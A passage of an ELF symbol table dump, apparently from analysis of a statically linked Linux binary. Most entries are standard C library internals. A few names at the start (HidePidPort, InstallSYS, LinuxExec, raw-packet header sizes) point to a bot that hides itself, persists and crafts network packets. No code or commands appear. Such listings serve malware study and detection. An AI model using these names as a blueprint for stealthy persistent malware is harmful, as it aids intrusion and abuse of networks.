                                                                                                                                          HidePidPort.symtab0x804a6db114FUNC<unknown>DEFAULT3
                                                                                                                                          InstallSYS.symtab0x8048b8c336FUNC<unknown>DEFAULT3
                                                                                                                                          LinuxExec.symtab0x8048eed122FUNC<unknown>DEFAULT3
                                                                                                                                          LinuxExec_Argv.symtab0x8048f67135FUNC<unknown>DEFAULT3
                                                                                                                                          LinuxExec_Argv2.symtab0x8048fee148FUNC<unknown>DEFAULT3
                                                                                                                                          LogFacility.symtab0x80cfa0c4OBJECT<unknown>DEFAULT21
                                                                                                                                          LogFile.symtab0x80cfa084OBJECT<unknown>DEFAULT21
                                                                                                                                          LogMask.symtab0x80cfa004OBJECT<unknown>DEFAULT21
                                                                                                                                          LogStat.symtab0x80d50444OBJECT<unknown>DEFAULT22
                                                                                                                                          LogTag.symtab0x80d50484OBJECT<unknown>DEFAULT22
                                                                                                                                          LogType.symtab0x80cfa044OBJECT<unknown>DEFAULT21
                                                                                                                                          MAGIC_STR.symtab0x80d1f6033OBJECT<unknown>DEFAULT22
                                                                                                                                          MainList.symtab0x80d1fa0264OBJECT<unknown>DEFAULT22
                                                                                                                                          ReadWord.symtab0x804e150137FUNC<unknown>DEFAULT3
                                                                                                                                          SIZE_DNS_H.symtab0x80cf4a44OBJECT<unknown>DEFAULT21
                                                                                                                                          SIZE_DNS_T.symtab0x80cf4a84OBJECT<unknown>DEFAULT21
                                                                                                                                          SIZE_IP_H.symtab0x80cf4984OBJECT<unknown>DEFAULT21
                                                                                                                                          SIZE_PSEUDO_HDR.symtab0x80cf4ac4OBJECT<unknown>DEFAULT21
                                                                                                                                          SIZE_TCP_H.symtab0x80cf4a04OBJECT<unknown>DEFAULT21
                                                                                                                                          SIZE_UDP_H.symtab0x80cf49c4OBJECT<unknown>DEFAULT21
                                                                                                                                          SYS_BUF.symtab0x80cfce01OBJECT<unknown>DEFAULT22
                                                                                                                                          SyslogAddr.symtab0x80d5060110OBJECT<unknown>DEFAULT22
                                                                                                                                          THREAD_NUM.symtab0x80d61704OBJECT<unknown>DEFAULT22
                                                                                                                                          _Exit.symtab0x8067a2819FUNC<unknown>DEFAULT3
                                                                                                                                          _GLOBAL_OFFSET_TABLE_.symtab0x80cf16c0OBJECT<unknown>HIDDEN20
                                                                                                                                          _IO_2_1_stderr_.symtab0x80cf700152OBJECT<unknown>DEFAULT21
                                                                                                                                          _IO_2_1_stdin_.symtab0x80cf5c0152OBJECT<unknown>DEFAULT21
                                                                                                                                          _IO_2_1_stdout_.symtab0x80cf660152OBJECT<unknown>DEFAULT21
                                                                                                                                          _IO_adjust_column.symtab0x805c9b060FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_adjust_wcolumn.symtab0x808477063FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_cleanup.symtab0x805d310409FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_doallocate.symtab0x805de10143FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_finish.symtab0x805e310525FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_imbue.symtab0x805cac05FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_pbackfail.symtab0x805d900310FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_read.symtab0x805ca9010FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_seek.symtab0x805ca7015FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_seekoff.symtab0x805c90015FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_seekpos.symtab0x805c81059FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_setbuf.symtab0x805dd10244FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_showmanyc.symtab0x805cab010FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_stat.symtab0x805ca8010FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_sync.symtab0x805c8f07FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_uflow.symtab0x805c7b052FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_underflow.symtab0x805c7a010FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_write.symtab0x805caa07FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_xsgetn.symtab0x805e250185FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_default_xsputn.symtab0x805cc80225FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_do_write.symtab0x805bd80271FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_doallocbuf.symtab0x805dc80133FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_fclose.symtab0x8057df0439FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_feof.symtab0x80596d0154FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_fgets.symtab0x8057ff0360FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_attach.symtab0x8059dc0133FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_close.symtab0x805a94018FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_close_it.symtab0x805b2f0581FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_close_mmap.symtab0x805a96060FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_doallocate.symtab0x80839b0275FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_finish.symtab0x805c4a0327FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_fopen.symtab0x805b5401388FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_init.symtab0x805b04051FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_jumps.symtab0x80b3e0084OBJECT<unknown>DEFAULT7
                                                                                                                                          _IO_file_jumps_maybe_mmap.symtab0x80b3ec084OBJECT<unknown>DEFAULT7
                                                                                                                                          _IO_file_jumps_mmap.symtab0x80b3e6084OBJECT<unknown>DEFAULT7
                                                                                                                                          _IO_file_open.symtab0x805af30263FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_overflow.symtab0x805c0301131FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_read.symtab0x805a9d048FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_seek.symtab0x8059fd018FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_seekoff.symtab0x805aa001245FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_seekoff_maybe_mmap.symtab0x8059f8080FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_seekoff_mmap.symtab0x8059e50297FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_setbuf.symtab0x805aee075FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_setbuf_mmap.symtab0x805b270115FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_stat.symtab0x805a9a037FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_sync.symtab0x805be90406FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_sync_mmap.symtab0x8059ff0165FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_underflow.symtab0x805b080495FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_underflow_maybe_mmap.symtab0x805a2e030FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_underflow_mmap.symtab0x805a6b066FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_write.symtab0x805a890166FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_xsgetn.symtab0x805a700394FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_xsgetn_maybe_mmap.symtab0x805a29067FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_xsgetn_mmap.symtab0x805a5b0242FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_file_xsputn.symtab0x805bab0705FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_flush_all.symtab0x805d4b020FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_flush_all_linebuffered.symtab0x805cf30448FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_flush_all_lockp.symtab0x805d0f0533FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_fopen.symtab0x80582a034FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_fprintf.symtab0x808333036FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_free_backup_area.symtab0x805cc2093FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_free_wbackup_area.symtab0x80847f0104FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_ftell.symtab0x8083ad0436FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_funlockfile.symtab0x80833c047FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_fwide.symtab0x8085950323FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_fwrite.symtab0x8083d60297FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_getc.symtab0x8059880207FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_getdelim.symtab0x8083eb0624FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_getline.symtab0x805844055FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_getline_info.symtab0x80582d0353FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_helper_jumps.symtab0x80c2a4084OBJECT<unknown>DEFAULT7
                                                                                                                                          _IO_helper_overflow.symtab0x8079fc0175FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_init.symtab0x805db50163FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_init_marker.symtab0x805dea0169FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_init_wmarker.symtab0x80850e0193FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_iter_begin.symtab0x805cad010FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_iter_end.symtab0x805cae07FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_iter_file.symtab0x805cb008FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_iter_next.symtab0x805caf011FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_least_marker.symtab0x805c69038FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_least_wmarker.symtab0x808457051FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_link_in.symtab0x805d4d0400FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_list_all.symtab0x80cf7984OBJECT<unknown>DEFAULT21
                                                                                                                                          _IO_list_all_stamp.symtab0x80d4b004OBJECT<unknown>DEFAULT22
                                                                                                                                          _IO_list_lock.symtab0x805cb1064FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_list_resetlock.symtab0x805cb9035FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_list_unlock.symtab0x805cb5056FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_marker_delta.symtab0x805ca4047FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_marker_difference.symtab0x805ca2017FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_mem_finish.symtab0x8085bb0106FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_mem_jumps.symtab0x80c2ea084OBJECT<unknown>DEFAULT7
                                                                                                                                          _IO_mem_sync.symtab0x8085b6076FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_do_write.symtab0x805bd80271FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_fclose.symtab0x8057df0439FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_file_attach.symtab0x8059dc0133FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_file_close_it.symtab0x805b2f0581FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_file_finish.symtab0x805c4a0327FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_file_fopen.symtab0x805b5401388FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_file_init.symtab0x805b04051FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_file_overflow.symtab0x805c0301131FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_file_seekoff.symtab0x805aa001245FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_file_setbuf.symtab0x805aee075FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_file_sync.symtab0x805be90406FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_file_underflow.symtab0x805b080495FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_file_write.symtab0x805a890166FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_file_xsputn.symtab0x805bab0705FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_new_fopen.symtab0x80582a034FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_no_init.symtab0x805da40259FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_old_init.symtab0x805c850150FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_padn.symtab0x8084150203FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_remove_marker.symtab0x805c9f040FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_seekmark.symtab0x805d840179FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_seekoff.symtab0x8084300233FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_seekoff_unlocked.symtab0x8084220224FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_seekwmark.symtab0x8084d40181FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_setb.symtab0x805cbc093FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_sgetn.symtab0x805c7f018FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_sputbackc.symtab0x805c91075FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_sputbackwc.symtab0x80846d073FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_sscanf.symtab0x808339036FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_stderr.symtab0x80cf9e44OBJECT<unknown>HIDDEN21
                                                                                                                                          _IO_stdfile_0_lock.symtab0x80d4b1012OBJECT<unknown>DEFAULT22
                                                                                                                                          _IO_stdfile_1_lock.symtab0x80d4b1c12OBJECT<unknown>DEFAULT22
                                                                                                                                          _IO_stdfile_2_lock.symtab0x80d4b2812OBJECT<unknown>DEFAULT22
                                                                                                                                          _IO_stdin.symtab0x80cf9dc4OBJECT<unknown>HIDDEN21
                                                                                                                                          _IO_stdin_used.symtab0x80b2b044OBJECT<unknown>DEFAULT7
                                                                                                                                          _IO_stdout.symtab0x80cf9e04OBJECT<unknown>HIDDEN21
                                                                                                                                          _IO_str_count.symtab0x805e6d023FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_str_finish.symtab0x805e6f060FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_str_init_readonly.symtab0x805ecc0132FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_str_init_static.symtab0x805ed50155FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_str_init_static_internal.symtab0x805ea20145FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_str_jumps.symtab0x80b3f2084OBJECT<unknown>DEFAULT7
                                                                                                                                          _IO_str_overflow.symtab0x805e8b0359FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_str_pbackfail.symtab0x805e73044FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_str_seekoff.symtab0x805eac0510FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_str_underflow.symtab0x805e68066FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_strn_jumps.symtab0x80b3d2084OBJECT<unknown>DEFAULT7
                                                                                                                                          _IO_strn_overflow.symtab0x805997099FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_sungetc.symtab0x805c96070FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_sungetwc.symtab0x808472070FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_switch_to_backup_area.symtab0x805c6f043FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_switch_to_get_mode.symtab0x805c720115FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_switch_to_main_get_area.symtab0x805c6c041FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_switch_to_main_wget_area.symtab0x80845b043FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_switch_to_wbackup_area.symtab0x80845e045FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_switch_to_wget_mode.symtab0x8084650121FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_un_link.symtab0x805d660425FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_unsave_markers.symtab0x805dc00114FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_unsave_wmarkers.symtab0x8085060120FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_vasprintf.symtab0x80aa880356FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_vdprintf.symtab0x8085c20188FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_vfprintf.symtab0x807a35020246FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_vfprintf_internal.symtab0x807a35020246FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_vfscanf.symtab0x8098d8022346FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_vfscanf_internal.symtab0x8098d8022346FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_vsnprintf.symtab0x80599e0213FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_vsscanf.symtab0x8084410140FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wdefault_doallocate.symtab0x8084f20151FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wdefault_finish.symtab0x8084b30130FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wdefault_pbackfail.symtab0x8084bc0376FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wdefault_uflow.symtab0x808461052FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wdefault_xsgetn.symtab0x8085360213FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wdefault_xsputn.symtab0x8084e00280FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wdo_write.symtab0x8058c30335FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wdoallocbuf.symtab0x8084fc0154FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wfile_doallocate.symtab0x8083cb0169FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wfile_jumps.symtab0x80b3c0084OBJECT<unknown>DEFAULT7
                                                                                                                                          _IO_wfile_jumps_maybe_mmap.symtab0x80b3cc084OBJECT<unknown>DEFAULT7
                                                                                                                                          _IO_wfile_jumps_mmap.symtab0x80b3c6084OBJECT<unknown>DEFAULT7
                                                                                                                                          _IO_wfile_overflow.symtab0x8059070579FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wfile_seekoff.symtab0x80586001578FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wfile_sync.symtab0x8058f10346FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wfile_underflow.symtab0x80592c01000FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wfile_underflow_maybe_mmap.symtab0x805848059FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wfile_underflow_mmap.symtab0x80584c0307FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wfile_xsputn.symtab0x8058d80393FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wide_data_0.symtab0x80cf7a0188OBJECT<unknown>DEFAULT21
                                                                                                                                          _IO_wide_data_1.symtab0x80cf860188OBJECT<unknown>DEFAULT21
                                                                                                                                          _IO_wide_data_2.symtab0x80cf920188OBJECT<unknown>DEFAULT21
                                                                                                                                          _IO_wmarker_delta.symtab0x80847b061FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wpadn.symtab0x80844a0203FUNC<unknown>DEFAULT3
                                                                                                                                          _IO_wsetb.symtab0x8084ac097FUNC<unknown>DEFAULT3
                                                                                                                                          _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                                          _L_lock_102.symtab0x8057fb316FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_106.symtab0x806b20516FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1091.symtab0x8052a9d12FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_10969.symtab0x8065bd516FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_11078.symtab0x8065c0112FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_11265.symtab0x8065c1916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_11360.symtab0x8065c4512FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_116.symtab0x805592616FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1198.symtab0x806d9e416FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1206.symtab0x805233316FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_122.symtab0x805646e16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_122.symtab0x8057ab816FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1244.symtab0x8069c2c16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_12694.symtab0x8065c5d16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_12751.symtab0x8065c8916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_12843.symtab0x8065ca912FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_130.symtab0x8055e9516FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_13011.symtab0x8065ccd16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_13091.symtab0x8065d0912FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_13253.symtab0x8065d2116FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_13355.symtab0x8065d4d12FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_13521.symtab0x8065d5916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1358.symtab0x806597912FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_13706.symtab0x8065d7916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_13895.symtab0x8065d9916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_140.symtab0x809501916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_14084.symtab0x8065db916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1419.symtab0x806598516FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_14258.symtab0x8065dd916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1449.symtab0x809646a16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_15157.symtab0x8065df916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_15208.symtab0x8065e1916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1544.symtab0x80659a516FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_15489.symtab0x8065e3916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1596.symtab0x807f27e12FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_16044.symtab0x8065e5916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1644.symtab0x80659d516FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1679.symtab0x80659e516FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_16810.symtab0x8065e7912FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1711.symtab0x805e55916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1711.symtab0x8065a0512FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1772.symtab0x805e56912FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_180.symtab0x805648e16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1860.symtab0x8065a1112FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_188.symtab0x8076c1516FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_19.symtab0x8055e7516FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_193.symtab0x80843e912FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_1961.symtab0x805e59116FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_20.symtab0x805642e16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_2016.symtab0x8087e6216FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_2029.symtab0x805e5a112FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_2047.symtab0x80596a812FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_2067.symtab0x805235316FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_21.symtab0x805590616FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_21.symtab0x805625716FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_21.symtab0x80b1a7713FUNC<unknown>DEFAULT4
                                                                                                                                          _L_lock_2120.symtab0x809649a16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_22.symtab0x80522d316FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_2241.symtab0x805237316FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_2251.symtab0x8087e8216FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_2299.symtab0x8087ea213FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_24.symtab0x805423916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_2482.symtab0x805e5d516FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_250.symtab0x8055eb516FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_2508.symtab0x805e5e512FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_253.symtab0x8057ad816FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_256.symtab0x805627716FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_259.symtab0x80b296113FUNC<unknown>DEFAULT5
                                                                                                                                          _L_lock_2665.symtab0x805e60d16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_2691.symtab0x805e61d12FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_2718.symtab0x805c5e712FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_277.symtab0x80522f316FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_287.symtab0x805425916FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_29.symtab0x805976a9FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_29.symtab0x805994f12FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_30.symtab0x806747e13FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_3027.symtab0x805239316FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_3070.symtab0x8065a1d16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_31.symtab0x805986212FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_3126.symtab0x806da0416FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_3147.symtab0x80523b316FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_3378.symtab0x8065a3d16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_34.symtab0x8083c8412FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_343.symtab0x809e4f912FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_3455.symtab0x8065a5d16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_35.symtab0x806bb2a12FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_3525.symtab0x8065a7d16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_357.symtab0x8069bfc16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_3590.symtab0x8065a9d16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_36.symtab0x8057fa712FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_3656.symtab0x80523e316FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_3670.symtab0x8065abd16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_37.symtab0x806594116FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_3761.symtab0x8065acd16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_3775.symtab0x805240316FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_3844.symtab0x8065aed16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_3915.symtab0x8065afd12FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_4163.symtab0x8065b1516FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_420.symtab0x8057b0816FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_4245.symtab0x805242316FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_4309.symtab0x805244316FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_4392.symtab0x8065b3512FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_44.symtab0x808412012FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_4528.symtab0x805246316FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_46.symtab0x805815812FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_47.symtab0x8083e8912FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_4725.symtab0x8065b4d16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_4841.symtab0x805e64516FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_4867.symtab0x805e65512FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_5047.symtab0x8065b6d16FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_51.symtab0x8057a9816FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_53.symtab0x806595112FUNC<unknown>DEFAULT3
                                                                                                                                          _L_lock_5301.symtab0x8065b8d12FUNC<unknown>DEFAULT3
